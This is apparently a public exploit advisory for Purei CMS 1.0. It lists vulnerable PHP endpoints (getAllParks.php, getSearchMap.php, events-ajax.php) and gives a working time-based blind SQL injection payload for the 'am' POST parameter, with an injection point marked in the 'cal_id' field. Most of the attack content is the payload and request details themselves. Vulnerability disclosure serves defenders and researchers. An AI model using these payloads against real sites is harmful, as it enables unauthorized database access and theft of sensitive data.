Headline
Purei CMS 1.0 SQL Injection
Purei CMS version 1.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: Purei CMS 1.0 - SQL Injection# Date: [27-03-2024]# Exploit Author: [Number 7]# Vendor Homepage: [purei.com]# Version: [1.0]# Tested on: [Linux]____________________________________________________________________________________Introduction:An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation of user input. Such an injection transpires when web applications accept user input directly inserted into an SQL statement without effectively filtering out hazardous characters.This could jeopardize the integrity of your database or reveal sensitive information.____________________________________________________________________________________Time-Based Blind SQL Injection:Vulnerable files:http://localhost/includes/getAllParks.phphttp://localhost/includes/getSearchMap.phpmake a POST request with the value of the am input set to : if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ make sure to url encode the inputs. SQL injection:Method: POST REQUESTVunerable file:/includes/events-ajax.php?action=getMonthdata for the POST req:month=3&type=&year=2024&cal_id=1[Inject Here]